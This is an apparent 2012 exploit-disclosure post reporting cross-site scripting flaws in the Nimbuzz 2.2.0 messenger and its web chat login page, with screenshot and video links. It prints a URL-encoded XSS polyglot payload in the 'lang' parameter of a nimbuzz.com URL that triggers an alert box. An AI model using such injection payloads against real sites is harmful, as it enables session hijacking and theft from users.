*# Exploit Title: Nimbuzz 2.2.0 Cross Site Scripting
# Date: 09.04.2012
# Author: Sony
# Software Link:
http://www.nimbuzz.com/en/get/voip-and-chat-on-pc/pc-client-downloaded
# Software Version: 2.2.0
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:http://st2tea.blogspot.com/2012/04/nimbuzz-220-cross-site-scripting.html
..................................................................*

* *

*Well, we have xss in the messenger, interesting place for xss)

http://1.bp.blogspot.com/-oZCtF5p8yPg/T4LmoWSfz-I/AAAAAAAAA8A/NwcttC0s4c0/s1600/ni.png

**We have xss in the Chat Window-->View in Browser. (persistent code)

Some pics and video PoC:

http://4.bp.blogspot.com/-lDyKyFhqWiU/T4LqFhg9LQI/AAAAAAAAA8M/Mc7FcodbdPM/s1600/nim.JPG

http://www.youtube.com/watch?v=t8mC6Oceq0Y

**And where is forget password: *
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

http://2.bp.blogspot.com/-LXxT4HBs80A/T4Lu1IdlbaI/AAAAAAAAA8Y/YyCzOcyh76I/s1600/nimb2.JPG